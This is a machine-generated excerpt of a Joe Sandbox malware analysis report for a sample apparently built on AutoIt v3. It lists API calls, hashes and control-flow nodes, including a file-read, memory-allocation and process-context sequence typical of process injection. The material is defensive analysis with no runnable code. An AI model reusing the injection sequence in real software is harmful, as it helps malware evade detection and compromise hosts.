Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Line:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1620655955-1585850449
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1579 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1580 538e3c0-538e506 call 538c010 call 538e2b0 CreateFileW 1587 538e508 1580->1587 1588 538e50d-538e51d 1580->1588 1589 538e5bd-538e5c2 1587->1589 1591 538e51f 1588->1591 1592 538e524-538e53e VirtualAlloc 1588->1592 1591->1589 1593 538e540 1592->1593 1594 538e542-538e559 ReadFile 1592->1594 1593->1589 1595 538e55b 1594->1595 1596 538e55d-538e597 call 538e2f0 call 538d2b0 1594->1596 1595->1589 1601 538e599-538e5ae call 538e340 1596->1601 1602 538e5b3-538e5bb ExitProcess 1596->1602 1601->1602 1602->1589
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0538E2B0: Sleep.KERNELBASE(000001F4), ref: 0538E2C1
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0538E4FC
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2105923084.000000000538C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0538C000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_538c000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFileSleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 699YD2QNMETYQ77I
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2694422964-3082335323
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 969caebfaa7628107d777b2a592666ce9a98ece6080561e4e6ceceec16a5b1cd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ad98ff97df18d36a5c6b37fdf6e3483268b04e160451b2ead197da283ebad1b5
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 969caebfaa7628107d777b2a592666ce9a98ece6080561e4e6ceceec16a5b1cd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB516F30E04348EAEF15DBE4D844BEEBA79AF54700F004599E609BB2C0D7B95B45CB65
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 00413AA6
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
  • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
• ___sbh_find_block.LIBCMT ref: 00413AB1
• ___sbh_free_block.LIBCMT ref: 00413AC0
• RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
• GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
• String ID:
• API String ID: 2714421763-0
• Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
• Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
• Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
• Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
APIs
  • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
• _strcat.LIBCMT ref: 0040F603
  • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
  • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
• String ID: HH
• API String ID: 1194219731-2761332787
• Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
• Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
• Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
• Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0538DA6B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0538DB01
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0538DB23
Memory Dump Source
• Source File: 00000000.00000002.2105923084.000000000538C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0538C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_538c000_AENiBH7X1q.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
• Instruction ID: 49f034481e4a2a9c76d3d4f79b3ba747338e11c8cb4f758ad685f2e7fa4d9985
• Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
• Instruction Fuzzy Hash: 4562FA70A142589BEB24DFA4C840BEEB376FF58300F1095A9D10DEB2D4E7B59E81CB59
APIs
• _memset.LIBCMT ref: 0040E202
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: IconNotifyShell__memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 928536360-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                                                                                                                                                                                                                                                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                                                                                                                                                                                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1411284514-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
• Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
• Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
• Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
APIs
• _malloc.LIBCMT ref: 00435278
  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
• _malloc.LIBCMT ref: 00435288
• _malloc.LIBCMT ref: 00435298
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _malloc$AllocateHeap
• String ID:
• API String ID: 680241177-0
• Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
• Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
• Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
• Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: ?
• API String ID: 3409977793-1684325040
• Opcode ID: e560479fc27c02defff92632e7fe9eb64bdceab8888f0f2f0c7111a6ba657ffa
• Instruction ID: 9bcf86f15823f24245d2df24eaf2d0b1add52508d906022a273d18f5af470a83
• Opcode Fuzzy Hash: e560479fc27c02defff92632e7fe9eb64bdceab8888f0f2f0c7111a6ba657ffa
• Instruction Fuzzy Hash: ADE1AB755082028BC710EF21C54566BB7A9AF84708F90493FF485772E2D77CEA8A879F
APIs
• _wcslen.LIBCMT ref: 00401B71
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: @EXITCODE
• API String ID: 580348202-3436989551
• Opcode ID: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
• Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
• Opcode Fuzzy Hash: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
• Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
